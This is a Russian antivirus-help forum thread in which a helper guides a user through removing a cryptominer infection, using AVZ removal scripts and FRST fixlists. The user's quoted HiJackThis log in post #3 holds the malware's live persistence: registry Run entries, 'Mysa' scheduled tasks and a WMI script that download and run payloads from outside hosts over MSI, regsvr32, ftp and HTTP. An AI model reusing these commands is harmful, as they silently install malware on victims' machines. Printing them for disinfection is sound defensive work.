Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 39.

Антивирус постоянно блокирует угрозы [Trojan.Win32.Miner.tvnc, Trojan-Ransom.Win32.Wanna.zbu ] (заявка № 219424)

  1. #1
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26

    Антивирус постоянно блокирует угрозы [Trojan.Win32.Miner.tvnc, Trojan-Ransom.Win32.Wanna.zbu ]

    Антивирус постоянно блокирует одни и те же объекты, сканирование ПК не помогает. Даже когда подозрительные объекты находятся в хранилище, проблема не решается.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    383
    Уважаемый(ая) DrStanislav, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    HiJackThis (из каталога autologger)профиксить
    Код:
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyOverride] = 127.0.0.1
    O2 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file)
    O2-32 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file)
    O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.ftp0118.info:280/helloworld.msi /q
    O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0118.info:280/v.sct scrobj.dll
    O4 - MSConfig\startupreg: MyDesktop [command] = C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe  /killme_30 /restoreme_5 /url_http://mpnl.ru/offers/uaby.csv /url2_http://hello.limbbo.ru/offers/uaby.csv (file missing) (HKCU) (2016/08/10)
    O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Закачать ВСЕ при помощи Download Master - (no file)
    O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Закачать при помощи Download Master - (no file)
    O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Передать на удаленную закачку DM - (no file)
    O9-32 - Button: HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no name) - (no file)
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file)
    O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
    O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
    O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
    O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
    O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
    O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)

    AVZ выполнить следующий скрипт.
    Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
     QuarantineFile('C:\Windows\help\lsmosee.exe','');
     QuarantineFile('c:\windows\debug\ok.dat','');
     QuarantineFile('c:\windows\debug\item.dat','');
     QuarantineFile('C:\Users\StanislaV\AppData\Roaming\TeamViewer\Java\jusched.exe','');
     QuarantineFile('C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe','');
     QuarantineFile('c:\users\stanis~1\appdata\local\temp\rarsfx15\magicwifi.exe','');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MyDesktop','command');
     DeleteFile('C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe','32');
     DeleteFile('C:\Windows\system32\Tasks\Java Update Schedule','64');
     DeleteFile('C:\Users\StanislaV\AppData\Roaming\TeamViewer\Java\jusched.exe','32');
     DeleteFile('c:\windows\debug\item.dat','32');
     DeleteFile('c:\windows\help\lsmosee.exe','32');
     DeleteFile('c:\windows\debug\ok.dat','32');
     DeleteFile('C:\Windows\system32\Tasks\ok','64');
     DeleteFile('C:\Windows\help\lsmosee.exe','32');
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true); 
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true); 
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true); 
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
     ExecuteWizard('SCU', 2, 3, true);
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.

    После перезагрузки:
    - Выполните в AVZ:
    Код:
    begin
     CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    - Подготовьте лог AdwCleaner и приложите его в теме.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  5. #4
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    Лог AdwCleaner

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  7. #6
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    Отчет после очистки

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    - Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
    • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
    • Нажмите кнопку Scan.
    • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
    • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  9. #8
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    Отчет

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    Сами настраивали следующую политику или вам это неизвестно?
    Код:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e4f67768-08f0-453e-ac49-8e727168e23a} <==== ATTENTION (Restriction - IP)
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
      Код:
      CreateRestorePoint:
      CloseProcesses:
      CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
      CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
      CHR HKLM-x32\...\Chrome\Extension: [pkijdmeepjhpenmighhaodgfoogncnlk] - <no Path/update_url>
      File: C:\Windows\system32\a.exe
      File: C:\Windows\system32\TmpA765.tmp
      File: C:\Windows\system32\TmpA65C.tmp
      File: C:\Windows\qeriuwjhrf
      Zip: C:\Windows\system32\a.exe;C:\Windows\system32\TmpA765.tmp;C:\Windows\system32\TmpA65C.tmp;C:\Windows\qeriuwjhrf
      2018-06-13 20:25 - 2018-06-13 20:38 - 000000000 ____D C:\Program Files (x86)\IObit
      2018-06-26 07:26 - 2015-10-31 23:08 - 000000000 ____D C:\Users\Все пользователи\IObit
      2018-06-26 07:26 - 2015-10-31 23:08 - 000000000 ____D C:\ProgramData\IObit
      Folder: C:\Windows\Help
      File: C:\Users\StanislaV\AppData\Local\BIT55ED.tmp
      File: C:\Windows\SysWOW64\dlumd10.dll
      File: C:\Windows\SysWOW64\dlumd11.dll
      File: C:\Windows\SysWOW64\dlumd9.dll
      File: C:\Windows\System32\dlumd10.dll
      File: C:\Windows\System32\dlumd11.dll
      File: C:\Windows\System32\dlumd9.dll
      ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} =>  -> No File
      ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> No File
      ContextMenuHandlers2: [RS File Recovery] -> {5DDE4698-CD62-42A2-9D87-D29AED370E3B} =>  -> No File
      ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> No File
      ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> No File
      Task: {AF76A4C7-8044-4EFB-BABF-6A4C2663342C} - System32\Tasks\Driver Booster SkipUAC (StanislaV) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe
      Task: {4CC0C756-5618-4CF1-8EEA-B1E6AD6F0871} - \Java Update Schedule -> No File <==== ATTENTION
      Task: {CB91F580-B97A-41F4-8BC0-C9C4470D5630} - System32\Tasks\Uninstaller_SkipUac_StanislaV => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
      AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
      AlternateDataStreams: C:\ProgramData\TEMP:6DEA77C2 [140]
      AlternateDataStreams: C:\Users\Все пользователи\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
      AlternateDataStreams: C:\Users\Все пользователи\TEMP:6DEA77C2 [140]
      HKU\S-1-5-21-1056889933-623668751-4224552474-1000\Software\Classes\exefile:  <==== ATTENTION
      Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.


    Файл <date>.zip (где <date> текущая дата и время) c рабочего стола загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  11. #10
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    Сам ничего не настраивал.

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
      Код:
      CreateRestorePoint:
      CloseProcesses:
      HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e4f67768-08f0-453e-ac49-8e727168e23a} <==== ATTENTION (Restriction - IP)
      C:\Windows\system32\a.exe
      C:\Windows\qeriuwjhrf
      C:\Windows\Help\lsmosee.exe
      Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  13. #12
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    Лог, сделан до появления угроз.
    - - - - -Добавлено - - - - -
    Еще угрозы,до этого их не было, блокировка подключения к сайтам. Началось после выполнения последнего скрипта в Farbar Recovery Scan Tool

    - - - - -Добавлено - - - - -

    Вот еще, после всех перечисленных действий которые Вы рекомендовали сделать,угроза пропала,теперь вновь обнаружена.
    Последний раз редактировалось DrStanislav; 03.07.2018 в 07:26.

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    приложите новый лог FRST, уточните пожалуйста указанная проблема проявляется во всех браузерах?
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  15. #14
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    Пользуюсь только браузером Яндекс. Установлены также Хром и Мазила,но ими не пользуюсь.

  16. #15
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    Цитата Сообщение от DrStanislav Посмотреть сообщение
    Пользуюсь только браузером Яндекс. Установлены также Хром и Мазила,но ими не пользуюсь.
    Но проблема в них присутствует? Необходимо понять, проблема в том, что присутствуют вредоносные расширения в яндекс-браузере?

    Когда речь идет о новых логов FSRT, то необходимо выполнить заново инструкции:

    - Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
    • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
    • Нажмите кнопку Scan.
    • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
    • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  17. #16
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    В них проблем не замечал.
    Вложения Вложения

  18. #17
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
      Код:
      CreateRestorePoint:
      CloseProcesses:
      File: C:\Windows\System32\drivers\xspltspk.sys
      File: C:\Windows\SysWOW64\Drivers\vde2otc3.sys
      File: C:\Program Files\Common Files\xp.dat
      File: C:\Program Files\Common Files\xpdown.dat
      File: C:\Windows\system32\ps
      File: C:\Windows\system32\p
      File: C:\Windows\system32\s
      Folder: C:\Users\StanislaV\AppData\Local\RadeonSettings
      File: C:\Windows\system32\Drivers\cnnctfy3.sys
      File: C:\Windows\system32\Drivers\cfywlan1.sys
      2018-06-26 07:26 - 2015-10-31 15:57 - 000000000 ____D C:\Users\StanislaV\AppData\Roaming\IObit
      2018-06-26 07:26 - 2015-10-31 15:57 - 000000000 ____D C:\Users\StanislaV\AppData\LocalLow\IObit
      2018-03-31 18:49 - 2018-03-31 18:49 - 000000000 _____ () C:\Users\StanislaV\AppData\Local\{86AAFA7F-23F2-4E8C-8BC8-E6E0A5F218EB}
      File: C:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe
      File: C:\Users\StanislaV\Desktop\WGCheck.exe
      CMD: netsh winsock reset
      Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  19. #18
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
      Код:
      CreateRestorePoint:
      CloseProcesses:
      Zip: C:\Program Files\Common Files\xp.dat;C:\Program Files\Common Files\xpdown.dat;C:\Windows\system32\ps;C:\Windows\system32\p;C:\Windows\system32\s
      C:\Program Files\Common Files\xp.dat
      C:\Program Files\Common Files\xpdown.dat
      C:\Windows\system32\ps
      C:\Windows\system32\p
      C:\Windows\system32\s
      Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.


    Файл <date>.zip с рабочего стола загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  20. #19
    Junior Member Репутация
    Регистрация
    24.06.2018
    Сообщений
    18
    Вес репутации
    26
    Лог
    Вложения Вложения

  21. #20
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  • Уважаемый(ая) DrStanislav, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Ответов: 9
      Последнее сообщение: 25.03.2018, 19:29
    2. Ответов: 8
      Последнее сообщение: 29.09.2015, 16:31
    3. Ответов: 2
      Последнее сообщение: 09.10.2014, 22:59
    4. Ответов: 4
      Последнее сообщение: 06.04.2013, 14:32
    5. NOD постоянно блокирует угрозы
      От avantgardist в разделе Помогите!
      Ответов: 9
      Последнее сообщение: 12.06.2010, 16:48

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00456 seconds with 17 queries